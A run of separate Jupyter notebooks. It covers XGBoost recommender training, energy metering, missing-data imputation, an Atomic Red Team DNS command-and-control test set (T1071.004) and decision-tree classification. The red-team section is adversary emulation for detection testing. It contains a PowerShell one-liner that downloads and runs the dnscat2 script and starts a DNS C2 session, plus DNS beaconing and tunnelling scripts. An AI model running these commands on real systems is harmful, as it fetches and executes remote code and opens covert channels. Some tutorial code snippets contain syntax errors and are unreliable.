cb.set_ticks([0,1])
cb.set_ticklabels([0,1])
im1 = axs[1].imshow(vi,cmap='jet')
fig.colorbar(im1, ax=axs[1], fraction=0.04, pad=0.1,orientation="horizontal")
im2 = axs[2].imshow(pi,cmap='jet')
fig.colorbar(im2, ax=axs[2], fraction=0.04, pad=0.1,orientation="horizontal")
# plt.close('all')
# plt.tight_layout()
plt.savefig(os.path.join(query_out_path,'q_'+str(i)+'.png'))
plt.show()
nsample
iii, fff = basecase.dataset[0:2]
iii.shape
fff.shape
from DiffNet.networks.resnets import ResNet
from DiffNet.networks.unets import UNetRes
rn = ResNet(in_channels=1, out_channels=1, num_hidden_features=2, n_resblocks=5)
gn = GoodNetwork(in_channels=1, out_channels=1, in_dim=64, out_dim=64)
```
| github_jupyter |
```
import utils.model
import pandas as pd
import utils.constants
import sklearn
import numpy as np
train_data = pd.read_parquet("preprocessed_training_features\\part.0.parquet")
test_data = pd.read_parquet("preprocessed_validation_features\\part.1.parquet")
feature_columns_w_TE = ['a_is_verified', 'b_is_verified',
'a_follows_b', 'bert_token_len',
'n_photos', 'n_videos', 'n_gifs',
'type_encoding', 'language_encoding', 'a_followers', 'a_following',
'b_followers', 'b_following', 'day_of_week', 'hour_of_day',
'b_creation_delta', 'a_creation_delta', 'TE_language_encoding_has_reply',
'TE_language_encoding_has_like',
'TE_language_encoding_has_retweet_comment',
'TE_language_encoding_has_retweet', 'TE_type_encoding_has_reply',
'TE_type_encoding_has_like', 'TE_type_encoding_has_retweet_comment',
'TE_type_encoding_has_retweet', 'TE_a_hash_has_reply',
'TE_a_hash_has_like', 'TE_a_hash_has_retweet_comment',
'TE_a_hash_has_retweet', 'TE_b_hash_has_reply', 'TE_b_hash_has_like',
'TE_b_hash_has_retweet_comment', 'TE_b_hash_has_retweet',
'TE_tweet_hash_has_reply', 'TE_tweet_hash_has_like',
'TE_tweet_hash_has_retweet_comment', 'TE_tweet_hash_has_retweet']
feature_columns_wo_TE = ['a_is_verified', 'b_is_verified',
'a_follows_b', 'bert_token_len',
'n_photos', 'n_videos', 'n_gifs',
'type_encoding', 'language_encoding', 'a_followers', 'a_following',
'b_followers', 'b_following', 'day_of_week', 'hour_of_day',
'b_creation_delta', 'a_creation_delta']
def random_mask_columns(df, columns, prob=0.75):
inds = np.random.binomial(1, prob, size = len(df)).astype(bool)
cols = df[columns]
cols.loc[inds] = -1
df[columns] = cols
return df
train_data = random_mask_columns(train_data, ['TE_a_hash_has_reply','TE_a_hash_has_like', 'TE_a_hash_has_retweet_comment','TE_a_hash_has_retweet'])
train_data = random_mask_columns(train_data, ['TE_b_hash_has_reply', 'TE_b_hash_has_like','TE_b_hash_has_retweet_comment', 'TE_b_hash_has_retweet'])
train_data = random_mask_columns(train_data, ['TE_tweet_hash_has_reply', 'TE_tweet_hash_has_like','TE_tweet_hash_has_retweet_comment', 'TE_tweet_hash_has_retweet'])
recsysxgb = utils.model.RecSysXGB1()
xgb_params = {'objective': 'binary:logistic', 'eval_metric':'map'}
recsysxgb.train_in_memory(train_data, feature_columns_w_TE, xgb_params, save_dir = "xgb_models_02")#add random mask for train data.
import matplotlib.pyplot as plt
like_preds = recsysxgb.infer(test_data, feature_columns_w_TE)[3].round()
print(sklearn.metrics.balanced_accuracy_score(test_data["has_like"]*1, like_preds))
print(sklearn.metrics.precision_score(test_data["has_like"]*1 , like_preds))
sklearn.metrics.ConfusionMatrixDisplay(sklearn.metrics.confusion_matrix(test_data["has_like"]*1, like_preds)).plot()
plt.show()
recsysxgb = utils.model.RecSysXGB1()
xgb_params = {'objective': 'binary:logistic', 'eval_metric':'map'}
recsysxgb.train_in_memory(train_data, feature_columns_wo_TE, xgb_params, save_dir = "xgb_models_02")#add random mask for train data.
import matplotlib.pyplot as plt
like_preds = recsysxgb.infer(test_data, feature_columns_wo_TE)[3].round()
print(sklearn.metrics.balanced_accuracy_score(test_data["has_like"]*1, like_preds))
print(sklearn.metrics.precision_score(test_data["has_like"]*1 , like_preds))
sklearn.metrics.ConfusionMatrixDisplay(sklearn.metrics.confusion_matrix(test_data["has_like"]*1, like_preds)).plot()
plt.show()
from utils.dataloader import RecSys2021PandasDataLoader
val_loader = RecSys2021PandasDataLoader(test_data, feature_columns_w_TE, mode = "validation")
res = recsysxgb.evaluate_validation_set(val_loader)
res
print(f"AP Reply: {res[0][0]} - RCE Reply: {res[0][1]}")
print(f"AP Reply: {res[0][1]} - RCE Reply: {res[0][1]}")
print(f"AP Reply: {res[0][2]} - RCE Reply: {res[0][2]}")
print(f"AP Reply: {res[0][3]} - RCE Reply: {res[0][3]}")
recsysxgb.clfs_["has_reply"].get_score(importance_type="gain")
pd.read_csv("simple_pandas_run\\results.csv", header=None)
#f2 = f2.drop(["reply","retweet","retweet_comment","like"], axis=1)
f2.head()
import pandas as pd
train = pd.read_parquet("preprocessed_training_features\\part.9.parquet")
test = pd.read_parquet("preprocessed_validation_features\\part.9.parquet")
train
train[train["b_user_id"] == '7F6C55FBCE9A4FB981B1DF01807C121B']["b_hash"]
test[test["b_user_id"] == '7F6C55FBCE9A4FB981B1DF01807C121B']["b_hash"]
import numpy as np
np.array([int(str(int("7F6C55FBCE9A4FB981B1DF01807C121B", 16))[:20])], dtype=np.uint64)
import ast
ast.literal_eval('0x7F6C55FBCE9A4FB981B1DF01807C121B')
int("7F6C55FBCE9A4FB981B1DF01807C121B", 16)%(2**32)
train.columns
test_data.columns
test_data
```
| github_jupyter |
# Energy Meter Examples
## Linux Kernel HWMon
More details can be found at https://github.com/ARM-software/lisa/wiki/Energy-Meters-Requirements#linux-hwmon.
```
import logging
from conf import LisaLogging
LisaLogging.setup()
```
#### Import required modules
```
# Generate plots inline
%matplotlib inline
import os
# Support to access the remote target
import devlib
from env import TestEnv
# RTApp configurator for generation of PERIODIC tasks
from wlgen import RTA, Ramp
```
## Target Configuration
The target configuration is used to describe and configure your test environment.
You can find more details in **examples/utils/testenv_example.ipynb**.
```
# Setup target configuration
my_conf = {
# Target platform and board
"platform" : 'linux',
"board" : 'juno',
"host" : '192.168.0.1',
# Devlib modules to load
"modules" : ["cpufreq"], # Required by rt-app calibration
# Folder where all the results will be collected
"results_dir" : "EnergyMeter_HWMON",
# Energy Meters Configuration for BayLibre's ACME Cape
"emeter" : {
"instrument" : "hwmon",
"conf" : {
# Prefixes of the HWMon labels
'sites' : ['a53', 'a57'],
# Type of hardware monitor to be used
'kinds' : ['energy']
},
'channel_map' : {
'LITTLE' : 'a53',
'big' : 'a57',
}
},
# Tools required by the experiments
"tools" : [ 'trace-cmd', 'rt-app' ],
# Comment this line to calibrate RTApp in your own platform
# "rtapp-calib" : {"0": 360, "1": 142, "2": 138, "3": 352, "4": 352, "5": 353},
}
# Initialize a test environment using:
te = TestEnv(my_conf, wipe=False, force_new=True)
target = te.target
```
## Workload Execution and Power Consumptions Samping
Detailed information on RTApp can be found in **examples/wlgen/rtapp_example.ipynb**.
Each **EnergyMeter** derived class has two main methods: **reset** and **report**.
- The **reset** method will reset the energy meter and start sampling from channels specified in the target configuration. <br>
- The **report** method will stop capture and will retrieve the energy consumption data. This returns an EnergyReport composed of the measured channels energy and the report file. Each of the samples can also be obtained, as you can see below.
```
# Create and RTApp RAMP task
rtapp = RTA(te.target, 'ramp', calibration=te.calibration())
rtapp.conf(kind='profile',
params={
'ramp' : Ramp(
start_pct = 60,
end_pct = 20,
delta_pct = 5,
time_s = 0.5).get()
})
# EnergyMeter Start
te.emeter.reset()
rtapp.run(out_dir=te.res_dir)
# EnergyMeter Stop and samples collection
nrg_report = te.emeter.report(te.res_dir)
logging.info("Collected data:")
!tree $te.res_dir
```
## Power Measurements Data
```
logging.info("Measured channels energy:")
logging.info("%s", nrg_report.channels)
logging.info("Generated energy file:")
logging.info(" %s", nrg_report.report_file)
!cat $nrg_report.report_file
```
| github_jupyter |
### Nulltity Dataframe
- Use either .isnull() or .isna()
### Total missing values
- .sum()
### Percentage of missingness
- .mean() * 100
### Graphical analysis of missing data - missingno package
```python
import missingno as msno
msno.bar(data) # visualize completeness of the dataframe
msno.matrix(airquality) # describes the nullity in the dataset and appears blank wherever there are missing values
msno.matrix(data, freq='M') # monthwise missing data
msno.matrix(data.loc['May-1976':'Jul-1976'], freq='M') # fine tuning
```
### Analyzing missingness percentage
- Before jumping into treating missing data, it is essential to analyze the various factors surrounding missing data. The elementary step in analyzing the data is to analyze the amount of missingness, that is the number of values missing for a variable.
```
import pandas as pd
# Load the airquality dataset
airquality = pd.read_csv('./../data/air-quality.csv', parse_dates=['Date'], index_col='Date')
# Create a nullity DataFrame airquality_nullity
airquality_nullity = airquality.isnull()
print(airquality_nullity.head())
# Calculate total of missing values
missing_values_sum = airquality_nullity.sum()
print('Total Missing Values:\n', missing_values_sum)
# Calculate percentage of missing values
missing_values_percent = airquality_nullity.mean() * 100
print('Percentage of Missing Values:\n', missing_values_percent)
```
### Visualize missingness
```
# Import missingno as msno
import missingno as msno
import matplotlib.pyplot as plt
%matplotlib inline
# Plot amount of missingness
msno.bar(airquality)
# Display bar chart of missing values
# display("bar_chart.png")
# Plot nullity matrix of airquality
msno.matrix(airquality)
# Plot nullity matrix of airquality with frequency 'M'
msno.matrix(airquality, freq='M')
# Plot the sliced nullity matrix of airquality with frequency 'M'
msno.matrix(airquality.loc['May-1976':'Jul-1976'], freq='M')
```
## Mean , Median, Mode Imputation
```python
from sklearn.impute import SimpleImputer
diabetes_mean = diabetes.copy(deep=True)
mean_imputer = SimpleImputer(strategy='mean')
diabetes_mean.iloc[:,:] = mean_imputer.fit_transform(diabetes_mean)
# for median -> strategy='median' for mode -> strategy='most_frequent'
constant_imputer = SimpleImputer(strategy = 'constant', fill_value = 0)
```
### Visualizing imputations
```python
fig, axes = plt.subplots(nrows=2, ncols=2, figsize=(10, 10))
nullity = diabetes['Serum_Insulin'].isnull()+diabetes['Glucose'].isnull()
imputations = {'Mean Imputation':diabetes_mean,
'Median Imputation':diabetes_median,
'Mode Imputation':diabetes_mode,
'Constant Imputation':, diabetes_constant}
for ax, df_key in zip(axes.flatten(), imputations):
# the flatten() method on axes flattens the axes array from (2,2) to (4,1)
# set 'colorbar=False' so that the color bar is not plotted
imputations[df_key].plot(x='Serum_Insulin', y='Glucose', kind='scatter', alpha=0.5, c=nullity, cmap='rainbow', ax=ax, colorbar=False, title=df_key)
```
- Observing the graph, there's a clear correlation between 'Serum_Insulin' and 'Glucose'. However the imputed values which are red just lie in a straight line as the imputed values do not vary against the other variable.
- **Therefore, we can conclude that mean, median and mode imputations only preserve these basic statistical features of the dataset but don't account for their correlations** .Moreover, this results in a bias in the dataset.
### Mean & median imputation
- Imputing missing values is the best method when you have large amounts of data to deal with. The simplest methods to impute missing values include filling in a constant or the mean of the variable or other basic statistical parameters like median and mode.
```
diabetes = pd.read_csv('./../data/pima-indians-diabetes data.csv')
diabetes.head()
from sklearn.impute import SimpleImputer
# Make a copy of diabetes
diabetes_mean = diabetes.copy(deep=True)
# Create mean imputer object
mean_imputer = SimpleImputer(strategy='mean')
# Impute mean values in the DataFrame diabetes_mean
diabetes_mean.iloc[:, :] = mean_imputer.fit_transform(diabetes_mean)
# Make a copy of diabetes
diabetes_median = diabetes.copy(deep=True)
# Create median imputer object
median_imputer = SimpleImputer(strategy='median')
# Impute median values in the DataFrame diabetes_median
diabetes_median.iloc[:, :] = median_imputer.fit_transform(diabetes_median)
```
### Mode and constant imputation
```
# Make a copy of diabetes
diabetes_mode = diabetes.copy(deep=True)
# Create mode imputer object
mode_imputer = SimpleImputer(strategy='most_frequent')
# Impute using most frequent value in the DataFrame mode_imputer
diabetes_mode.iloc[:, :] = mode_imputer.fit_transform(diabetes_mode)
# Make a copy of diabetes
diabetes_constant = diabetes.copy(deep=True)
# Create median imputer object
constant_imputer = SimpleImputer(strategy='constant', fill_value=0)
# Impute missing values to 0 in diabetes_constant
diabetes_constant.iloc[:, :] = constant_imputer.fit_transform(diabetes_constant)
```
### Visualize imputations
- Analyzing imputations and choosing the best one, is a task that requires lots of experimentation. It is important to make sure that our data does not become biased while imputing. We created 4 different imputations using mean, median, mode, and constant filling imputations.
- We'll create a scatterplot of the DataFrames we imputed previously. To achieve this, we'll create a dictionary of the DataFrames with the keys being their title.
```
import matplotlib.pyplot as plt
%matplotlib inline
# Set nrows and ncols to 2
fig, axes = plt.subplots(nrows=2, ncols=2, figsize=(10, 10))
nullity = diabetes.Serum_Insulin.isnull()+diabetes.Glucose.isnull()
# Create a dictionary of imputations
imputations = {'Mean Imputation': diabetes_mean, 'Median Imputation': diabetes_median,
'Most Frequent Imputation': diabetes_mode, 'Constant Imputation': diabetes_constant}
# Loop over flattened axes and imputations
for ax, df_key in zip(axes.flatten(), imputations):
# Select and also set the title for a DataFrame
imputations[df_key].plot(x='Serum_Insulin', y='Glucose', kind='scatter',
alpha=0.5, c=nullity, cmap='rainbow', ax=ax,
colorbar=False, title=df_key)
plt.show()
```
- Notice how these imputations are portrayed as a straight line and don't adjust to the shape of the data
# Imputing using fancyimpute
- fancyimpute is a package containing several advanced imputation techniques that use machine learning algorithms to impute missing values.
- In mean, median, mode imputations only the respective column was utilized for computing and imputing missing values.
- In contrast, the advanced imputation techniques use other columns as well to predict the missing values and impute them. Think of it as fitting a ML model to predict the missing values in a column using the remaining columns.
- **KNN imputation** : find the most similar data points using all the non-missing features for a data point and calculates the average of these similar points to fill the missing feature. Here K specifies the number of similar or nearest points to consider.
```python
from fancyimpute import KNN
knn_imputer = KNN()
diabetes_knn = diabetes.copy(deep=True)
diabetes_knn.iloc[:,:] = knn_imputer.fit_transform(diabetes_knn)
```
#### Multiple Imputations by Chained Equations (MICE)
- Perform multiple regression over random sample of the data
- Take average of the multiple regression values
- Impute the missing feature value for the data point
- The MICE function is called 'IterativeImputer' in the fancyimpute package as it performs multiple imputations on the data.
```python
from fancyimpute import IterativeImputer
MICE_imputer = IterativeImputer()
diabetes_MICE = diabetes.copy(deep=True)
diabetes_MICE.iloc[:,:] = MICE_imputer.fit_transform(diabetes_MICE)
```
## KNN imputation
- **Datasets always have features which are correlated. Hence, it becomes important to consider them as a factor for imputing missing values**. Machine learning models use features in the DataFrame to find correlations and patterns and predict a selected feature.
- One of the simplest and most efficient models is the K Nearest Neighbors. It finds 'K' points most similar to the existing data points to impute missing values.
```
diabetes = pd.read_csv('./../data/pima-indians-diabetes data.csv')
diabetes.head()
diabetes.isnull().sum()
# Import KNN from fancyimpute
from fancyimpute import KNN
# Copy diabetes to diabetes_knn_imputed
diabetes_knn_imputed = diabetes.copy(deep=True)
# Initialize KNN
knn_imputer = KNN()
# Impute using fit_tranform on diabetes_knn_imputed
diabetes_knn_imputed.iloc[:, :] = knn_imputer.fit_transform(diabetes_knn_imputed)
diabetes_knn_imputed.isnull().sum()
```
# MICE imputation
- Here, we will use IterativeImputer or popularly called MICE for imputing missing values.The IterativeImputer performs multiple regressions on random samples of the data and aggregates for imputing the missing values.
```
diabetes = pd.read_csv('./../data/pima-indians-diabetes data.csv')
diabetes.head()
# Import IterativeImputer from fancyimpute
from fancyimpute import IterativeImputer
# Copy diabetes to diabetes_mice_imputed
diabetes_mice_imputed = diabetes.copy(deep=True)
# Initialize IterativeImputer
mice_imputer = IterativeImputer()
# Impute using fit_tranform on diabetes
diabetes_mice_imputed.iloc[:, :] = mice_imputer.fit_transform(diabetes)
diabetes_mice_imputed.isnull().sum()
```
## Imputing categorical values
- The complexity with categorical data is that they are usually strings. Hence imputations cannot be applied on them. The categorical values must first be converted or encoded to numeric values and then imputed.
- For converting categories to numeric values we need to encode the categories using ordinal encoder or one-hot encoder.
## Imputation techniques
- Simplest way is to just fill with most frequent category.
- Impute using statistical models like KNN
- Ordinal encoding cannot handle Nans, so skip Nans and then compute missing values.
### Ordinal Encoding
```python
from sklearn.preprocessing import OrdinalEncoder
# create Ordinal Encoder
ambience_ord_enc = OrdinalEncoder()
# select non-null values in ambience
ambience = users['ambience']
**ambience_not_null = ambience[ambience.notnull()]**
reshaped_vals = ambience_not_null.values.reshape(-1, 1)
# encode the non-null values of ambience
encoded_vals = ambience_ord_enc.fit_transform(reshaped_vals)
# replace the ambience column with ordinal values
users.loc[ambience.notnull(), 'ambience'] = np.squeeze(encoded_vals)
# generalized form for conversion by looping over the columns
# create a dictionary for ordinal encoders
ordinal_enc_dict = {}
# loop over columns to encode
for col_name in users:
# create ordinal encoder for the column
ordinal_enc_dict[col_name] = OrdinalEncoder()
# select the non-null values in the column
col = users[col_name]
col_not_null = col[col.notnull()]
reshaped_vals = col_not_null.values.reshape(-1, 1)
# encode the non-null values of the column
encoded_vals = ordinal_enc_dict[col_name].fit_transform(reshaped_vals)
# here we are also creating a unique encoder for each column and storing them using a dictionary 'ordinal_enc_dict'. This will help us to later convert them back to their respective categories
# imputing with KNN
users_KNN_imputed = users.copy(deep=True)
# create MICE imputer
KNN_imputer = KNN()
users_KNN_imputed.iloc[:,:] = np.round(KNN_imputer.fit_transform(imputed))
# last step is to convert back the ordinal values to its labels using the method **'inverse_transform'** with respective encoders and columns.
for col in imputed:
reshaped_col = imputed[col].values.reshape(-1, 1)
users_KNN_imputed[col] = ordinal_enc[col].inverse_transform(reshaped_col)
```
### Ordinal encoding of a categorical column
- Imputing categorical values involves a few additional steps over imputing numerical values. We need to first convert them to numerical values as statistical operations cannot be performed on strings.
```
users = pd.read_csv('./../data/')
from sklearn.preprocessing import OrdinalEncoder
# Create Ordinal encoder
ambience_ord_enc = OrdinalEncoder()
# Select non-null values of ambience column in users
ambience = users['ambience']
ambience_not_null = ambience[ambience.notnull()]
# Reshape ambience_not_null to shape (-1, 1)
reshaped_vals = ambience_not_null.values.reshape(-1, 1)
# Ordinally encode reshaped_vals
encoded_vals = ambience_ord_enc.fit_transform(reshaped_vals)
# Assign back encoded values to non-null values of ambience in users
users.loc[ambience.notnull(), 'ambience'] = np.squeeze(encoded_vals)
# Ordinal encoding of a DataFrame
# Create an empty dictionary ordinal_enc_dict
ordinal_enc_dict = {}
for col_name in users:
# Create Ordinal encoder for col
ordinal_enc_dict[col_name] = OrdinalEncoder()
col = users[col_name]
print(ordinal_enc_dict)
# Select non-null values of col
col_not_null = col[col.notnull()]
reshaped_vals = col_not_null.values.reshape(-1, 1)
encoded_vals = ordinal_enc_dict[col_name].fit_transform(reshaped_vals)
# Store the values to non-null values of the column in users
users.loc[col.notnull(), col_name] = np.squeeze(encoded_vals)
```
- Using this for loop, we're now able to automate encoding all categorical columns in the DataFrame!
```
# Create KNN imputer
KNN_imputer = KNN()
# Impute and round the users DataFrame
users.iloc[:, :] = np.round(KNN_imputer.fit_transform(users))
# Loop over the column names in users
for col_name in users:
# Reshape the data
reshaped = users[col_name].values.reshape(-1, 1)
# Perform inverse transform of the ordinally encoded columns
users[col_name] = ordinal_enc_dict[col_name].inverse_transform(reshaped)
```
- We're now able to convert categorical values to numerical ones, impute them using machine learning, and then re-convert them to categorical ones!
## Evaluation of different imputation techniques
- In Data Science, we usually impute missing data in order to improve model performance and decrease bias.
- Imputation with maximum machine learning model performance is selected.
- We can also use a simple linear regression on the various imputations we have done.
- **Another way to observe the imputation performance is to observe their density plots and see which one most resembles the shape of the original data**
- To perform linear regression we can use the statsmodels package as it produces various statistical summaries.
- Fit a linear model for statistical summary
- We can first create the complete case `diabetes_cc` by dropping the rows with missing values.
- This will be the baseline model to compare against other imputations.
```python
import statsmodels.api as sm
diabetes_cc = diabetes.dropna(how='any')
X = sm.add_constant(diabetes_cc.iloc[:, : -1])
y = diabetes_cc["Class"]
lm = sm.OLS(y,X).fit()
print(lm.summary())
```
#### R-squared and Coefficients
- While the R-sqaured measures the accuracy of the machine learning model, the coefficients explain the weights of different features in the data. The higher the R-squared the better the model.
- We can get the R-squared and coefficents using `lm.rsquared_adj` and `lm.params`
#### Fit linear model on different imputed Dataframes
```python
# mean imputation
X = sm.add_constant(diabetes_mean_imputed.iloc[:,:-1])
y = diabetes['Class']
lm_mean = sm.OLS(y, X).fit()
# KNN imputation
X = sm.add_constant(diabetes_knn_imputed.iloc[:,:-1])
lm_KNN = sm.OLS(y, X).fit()
# MICE Imputation
X = sm.add_constant(diabetes_mice_imputed.iloc[:,:-1])
lm_MICE = sm.OLS(y, X).fit()
```
#### Comparing R-squared of different imputations
```python
print(pd.DataFrame({'Complete':lm.rsquared_adj,
'Mean Imp':lm_mean.rsquared_adj,
'KNN Imp':lm_KNN.rsquared_adj,
'MICE Imp':lm_MICE.rsquared_adj},
index=['R_squared_adj']))
```
- We observe that the mean imputation has the least R-squared as it imputes the same mean value throughout the column.
- The complete case has the highest R-squared as half the rows with missing values have been dropped for fitting the linear model.
- We can similarly compare the coefficients of each of the imputations using the `.params` attribute
```python
print(pd.DataFrame({'Complete':lm.params,
'Mean Imp':lm_mean.params,
'KNN Imp':lm_KNN.params,
'MICE Imp':, lm_MICE.params}))
```
- We see that columns show that the imputed values add more weights to reinforce these features in the imputations.
#### Comparing density plots
- We can compare the density plots of the imputations to check which imputation most resembles the original dataset and does not introduce a bias.
```python
diabetes_cc['Skin_Fold'].plot(kind='kde', c='red', linewidth=3)
diabetes_mean_imputed['Skin_Fold'].plot(kind='kde')
diabetes_knn_imputed['Skin_Fold'].plot(kind='kde')
diabetes_mice_imputed['Skin_Fold'].plot(kind='kde')
labels = ['Baseline (complete case)', 'Mean Imputation', 'KNN Imputation', 'MICE Imputation']
plt.legend(labels)
plt.xlabel('Skin Fold')
```
- We observe that the mean imputation is completely out of shape as compared to the other imputations.
- The KNN and MICE imputations are much more identical to the base DataFrame with the peak of MICE imputation being slightly shifted.
### Analyze the summary of linear model
- Analyzing the performance of the different imputed models is one of the most significant tasks in dealing with missing data. It determines, the type of imputed DataFrame we can rely upon.
- For analysis, we can fit a linear regression model on the imputed DataFrame and check for various parameters that impact the selection of the imputation type.
```
diabetes_cc = pd.read_csv('./../data/pima-indians-diabetes data.csv')
diabetes_cc.head()
```
### Drop missing values : base line dataset
```
diabetes_cc.dropna(inplace=True)
diabetes_cc.reset_index(inplace = True, drop=True)
diabetes_cc.head()
print(diabetes_cc.shape)
diabetes_cc.isnull().sum()
import statsmodels.api as sm
# Add constant to X and set X & y values to fit linear model
X = sm.add_constant(diabetes_cc.iloc[:, : -1])
y = diabetes_cc["Class"]
lm = sm.OLS(y, X).fit()
# linear model for mean imputation
X = sm.add_constant(diabetes_mean.iloc[:,:-1])
y = diabetes_mean['Class']
lm_mean = sm.OLS(y, X).fit()
# linear model for KNN imputation
X = sm.add_constant(diabetes_knn_imputed.iloc[:,:-1])
y = diabetes_knn_imputed['Class']
lm_KNN = sm.OLS(y, X).fit()
# linear model for MICE imputation
X = sm.add_constant(diabetes_mice_imputed.iloc[:,:-1])
y = diabetes_mice_imputed['Class']
lm_MICE = sm.OLS(y, X).fit()
# Print summary of lm
print('\nSummary: ', lm.summary())
# Print R squared score of lm
print('\nAdjusted R-squared score: ', lm.rsquared_adj)
# Print the params of lm
print('\nCoefficcients:\n', lm.params)
```
## Comparing R-squared and coefficients : Numerical analysis
- During the analysis of imputed DataFrames on a linear model, the R-squared score which explains the accuracy and the coefficients which explains the model itself can act as some of the important characteristics to check for the quality of imputation.
```
# Store the Adj. R-squared scores of the linear models
r_squared = pd.DataFrame({'Complete Case': lm.rsquared_adj,
'Mean Imputation': lm_mean.rsquared_adj,
'KNN Imputation': lm_KNN.rsquared_adj,
'MICE Imputation': lm_MICE.rsquared_adj},
index=['Adj. R-squared'])
print(r_squared)
# Store the coefficients of the linear models
coeff = pd.DataFrame({'Complete Case': lm.params,
'Mean Imputation': lm_mean.params,
'KNN Imputation': lm_KNN.params,
'MICE Imputation': lm_MICE.params})
print(coeff)
r_squares = {'KNN Imputation': lm_KNN.rsquared_adj,
'Mean Imputation': lm_mean.rsquared_adj,
'MICE Imputation': lm_MICE.rsquared_adj}
# Select best R-squared
best_imputation = max(r_squares, key=r_squares.get)
print("The best imputation technique is: ", best_imputation)
```
### Comparing density plots : Graphical analysis
- The different imputations that we have performed earlier can be graphically compared with their density plots to realize which dataset has the most similar distribution compared to the original dataset. We will also be able to interpret which dataset has a biased imputation.
```
# Plot graphs of imputed DataFrames and the complete case
diabetes_cc['Skin_Fold'].plot(kind='kde', c='red', linewidth=3)
diabetes_mean['Skin_Fold'].plot(kind='kde')
diabetes_knn_imputed['Skin_Fold'].plot(kind='kde')
diabetes_mice_imputed['Skin_Fold'].plot(kind='kde')
# Create labels for the four DataFrames
labels = ['Baseline (Complete Case)', 'Mean Imputation', 'KNN Imputation', 'MICE Imputation']
plt.legend(labels)
# Set the x-label as Skin Fold
plt.xlabel('Skin_Fold')
plt.show()
```
| github_jupyter |
# T1071.004 - Application Layer Protocol: DNS
Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling)
## Atomic Tests
```
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force
```
### Atomic Test #1 - DNS Large Query Volume
This test simulates an infected host sending a large volume of DNS queries to a command and control server.
The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
for($i=0; $i -le 1000; $i++) { Resolve-DnsName -type "TXT" "atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io" -QuickTimeout}
```
```
Invoke-AtomicTest T1071.004 -TestNumbers 1
```
### Atomic Test #2 - DNS Regular Beaconing
This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.
This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
Set-Location PathToAtomicsFolder
.\T1071.004\src\T1071-dns-beacon.ps1 -Domain 127.0.0.1.xip.io -Subdomain atomicredteam -QueryType TXT -C2Interval 30 -C2Jitter 20 -RunTime 30
```
```
Invoke-AtomicTest T1071.004 -TestNumbers 2
```
### Atomic Test #3 - DNS Long Domain Query
This test simulates an infected host returning data to a command and control server using long domain names.
The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold.
Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
Set-Location PathToAtomicsFolder
.\T1071.004\src\T1071-dns-domain-length.ps1 -Domain 127.0.0.1.xip.io -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType TXT
```
```
Invoke-AtomicTest T1071.004 -TestNumbers 3
```
### Atomic Test #4 - DNS C2
This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
The following blogs have more information.
https://github.com/iagox86/dnscat2
https://github.com/lukebaggett/dnscat2-powershell
**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
Start-Dnscat2 -Domain example.com -DNSServer 127.0.0.1
```
```
Invoke-AtomicTest T1071.004 -TestNumbers 4
```
## Detection
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)
Monitor for DNS traffic to/from known-bad or suspicious domains.
| github_jupyter |
```
import pandas as pd
```
# Classification
We'll take a tour of the methods for classification in sklearn. First let's load a toy dataset to use:
```
from sklearn.datasets import load_breast_cancer
breast = load_breast_cancer()
```
Let's take a look
```
# Convert it to a dataframe for better visuals
df = pd.DataFrame(breast.data)
df.columns = breast.feature_names
df
```
And now look at the targets
```
print(breast.target_names)
breast.target
```
## Classification Trees
Using the scikit learn models is basically the same as in Julia's ScikitLearn.jl
```
from sklearn.tree import DecisionTreeClassifier
cart = DecisionTreeClassifier(max_depth=2, min_samples_leaf=140)
cart.fit(breast.data, breast.target)
```
Here's a helper function to plot the trees.
# Installing Graphviz (tedious)
## Windows
1. Download graphviz from https://graphviz.gitlab.io/_pages/Download/Download_windows.html
2. Install it by running the .msi file
3. Set the pat variable:
(a) Go to Control Panel > System and Security > System > Advanced System Settings > Environment Variables > Path > Edit
(b) Add 'C:\Program Files (x86)\Graphviz2.38\bin'
4. Run `conda install graphviz`
5. Run `conda install python-graphviz`
## macOS and Linux
1. Run `brew install graphviz` (install `brew` from https://docs.brew.sh/Installation if you don't have it)
2. Run `conda install graphviz`
3. Run `conda install python-graphviz`
```
import graphviz
import sklearn.tree
def visualize_tree(sktree):
dot_data = sklearn.tree.export_graphviz(sktree, out_file=None,
filled=True, rounded=True,
special_characters=False,
feature_names=df.columns)
return graphviz.Source(dot_data)
visualize_tree(cart)
```
We can get the label predictions with the `.predict` method
```
labels = cart.predict(breast.data)
labels
```
